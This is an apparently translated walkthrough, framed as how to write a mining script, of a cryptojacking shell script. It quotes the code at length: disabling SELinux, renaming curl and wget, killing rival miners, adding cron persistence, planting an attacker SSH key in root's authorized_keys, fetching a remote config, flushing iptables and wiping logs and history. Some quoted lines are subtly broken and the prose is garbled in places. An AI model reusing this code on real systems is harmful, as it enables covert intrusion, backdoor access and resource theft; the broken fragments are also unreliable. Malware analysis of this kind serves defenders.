How to write the mining script of the database

01.Code 1

#! /bin/sh

The first line of the script looks like a line of comments, but it is not. It specifies which SHELL will be used to execute the next script.

Like bash, zsh, etc., which we usually use, belong to the superset of sh. This script uses sh as the shell for execution and has better portability.

02.Code 2

setenforce 0 2>dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null

Setenforce is Linux's selinux firewall configuration command, and executing setenforce 0 means closing the selinux firewall. 2 stands for standard error (stderr).

Therefore, the wrong output of the command can be avoided by using the redirection symbol to transmit it to the /dev/null device. This device is a virtual device, which means doing nothing. Perfect for doing bad things quietly.

03.Code 3

sync && echo 3 >/proc/sys/vm/drop_caches

The script helps us release some memory resources intimately, so as to obtain more resources for mining.

As we all know, Linux system will produce a lot of caches with long-term operation, and the cleaning method is to write a number into the drop_caches file, which is usually 3.

The sync command writes all unwritten system buffers to the disk, and then the cache can be released safely after execution.

04.Code 4

crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` echo 1 > /etc/sysupdates rtdir="/etc/ sysupdates" bbdir="/usr/bin/curl" bbdira="/usr/bin/cur" ccdir="/usr/bin/wget" ccdira="/usr/bin/wge" mv /usr/bin/wget /usr/bin/get mv /usr/bin/xget / usr/bin/get mv /usr/bin/get /usr/bin/wge mv /usr/bin/curl /usr/bin/url mv /usr/bin/xurl /usr/bin/url mv /usr/bin/url /usr/bin/cur

That's right, the above statements just complete some common operations. It should be noted that it uses the mv command to rename some commonly used commands.

When executing the command, it will appear that it is divided into functional pains. This script has changed some files of the computer, which belongs to the category of crime.

In order to reuse some functions, the script abstracts many functions. Let's jump directly to the execution of the main function, and then take a look at the process.

05.Code 5

The first is the kill_miner_proc function. The code is very long, so I won't post it all.

kill_miner_proc() { ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 ... pkill -f biosetjenkins pkill -f Loopback ... crontab -r rm -rf /var/spool/cron/*

The field of mining is a field of mutual love and killing. This method first uses a combination of ps, grep and kill to kill the mining scripts of peers, and then stops the cron scripts of peers, which makes people feel black and white.

In this script, the pkill command is used. This command will terminate the process and kick out the user according to the terminal number, which is more violent.

06.Code 6

The next execution is the kill_sus_proc function.

ps axf -o "pid"|while read procid do ... done

Ps plus O parameter can specify the column to be output, where only the pid of the process is output, and then the read function is used to traverse the procid.

07.Code 7

ls -l /proc/$procid/exe | grep /tmp if [ $? -ne 1 ] then ... fi

The above is the traversal operation process, and we can see the syntax of the if statement. Of which $? Refers to the exit status of the last command.

0 means there is no error, and any other value means there is an error. "tmp" is a matchable string, that is, "-ne" means not equal to.

08.Code 8

ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid do ... done

Hehe, there is another loop traversal above. However, the target this time is that the CPU uses more than 40% of the processes. This is a bit cruel: it will affect my mining process and I will die! What's the hurry?

09.Code 9

Next, the script performs different operations for different user attributes.

The first is the root user. Determine whether it is root permission by judging whether there is a $rtdir file.

chattr -i /etc/sysupdate* chattr -i /etc/config.json* chattr -i /etc/update.sh* chattr -i /root/.ssh/authorized_keys* chattr -i /etc/networkservice

It is a wise security measure to use chattr command to set some key files as read-only properties to prevent unnecessary modification. Then, operate the cron program and add the update service of the script to the timing.

It is the following script.

10.Code 10

if [ ! -f "/usr/bin/crontab" ] then echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir} else [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab - fi

Note [[ $cont =~ "update.sh" ]] This is a small piece of code, which is very weird. The [[]] command built into the Shell supports pattern matching of strings.

= ~ You can use shell regular expressions, which makes it very powerful. Because its output is Boolean, you can use || to connect.

And the single parenthesis () behind it is a command group. Multiple commands in parentheses are separated by semicolons, and the last command can be without semicolons. The effect of' cmd' is basically the same.

11.Code 11

After the scheduled task is completed, it is necessary to configure ssh automatic login by appending the public key to the trust list.

chmod 700 /root/.ssh/ echo >> /root/.ssh/authorized_keys chmod 600 root/.ssh/authorized_keys echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/

12.Code 12

Speak of the devil, and the following script uses `` to operate.

filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'` if [ "$filesize_config" -ne "$config_size" ] then pkill -f sysupdate rm /etc/ config.json downloads $config_url /etc/config.json $config_url_backup else echo "no need download" fi

Perform a series of operations to obtain the size of the configuration file, and if the file size does not meet the requirements, download a file again. This uses the downloads function.

The function in the shell looks weird, and the parameters behind it are passed to the function just like script passing.

13.Code 13

downloads $config_url /etc/config.json $config_url_backup

In this sentence, three parameters are passed. Of course, the file should be downloaded from a remote server. We know nothing, except that the domain name ends in. de, which indicates that it is a German domain name.

downloads() { if [ -f "/usr/bin/curl" ] then echo $1, $2 http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1` if [ "$http_code" -eq "200" ] then curl --connect-timeout 10 --retry 100 $1 > $2 elif [ "$http_code" -eq "405" ] then curl --connect-timeout 10 --retry 100 $1 > $2 else curl --connect-timeout 10 --retry 100 $3 > $2 fi elif [ -f "/usr/bin/cur" ] then http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1` if [ "$http_code" -eq "200" ] then cur --connect-timeout 10 --retry 100 $1 > $2 elif [ "$http_code" -eq "405" ] then cur --connect-timeout 10 --retry 100 $1 > $2 else cur --connect-timeout 10 --retry 100 $3 > $2 fi elif [ -f "/usr/bin/wget" ] then wget --timeout=10 --tries=100 -O $2 $1 if [ $? -ne 0 ] then wget --timeout=10 --tries=100 -O $2 $3 fi elif [ -f "/usr/bin/wge" ] then wge --timeout=10 --tries=100 -O $2 $1 if [ $? -eq 0 ] then wge --timeout=10 --tries=100 -O $2 $3 fi fi }

I think the author of this code is poorly written and very long, which does not reflect his actual level. It should be to catch up with the construction period. Without thinking about the reuse of the code, it will be written so badly.

As we mentioned above, the script changed the names of several commands, including curl. This command is so powerful that the script author has to add multiple parameters.

-I: Used to test the http header information.

-m: Set the maximum transmission time.

-o: Specifies the file name to keep. This is /dev/null, uh, uh, uh ......

-s: Silent mode, no output.

--connect-timeout: connection timeout.

--retry: Retry times, that's tough, 100 times.

If there is no curl? Then use the substitute wget, and the routine is the same.

14.Code 14

Followed by a series of similar operations, and finally, a batch of operations on iptables.

iptables -F iptables -X iptables -A OUTPUT -p tcp --dport 3333 -j DROP iptables -A OUTPUT -p tcp --dport 5555 -j DROP iptables -A OUTPUT -p tcp --dport 7777 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP iptables -I INPUT -s 43.245.222.57 -j DROP service iptables reload

15.Code 15

Careful script writers also use commands to clean up the operation log.

history -c echo > /var/spool/mail/root echo > /var/log/wtmp echo > /var/log/secure echo > /root/.bash_history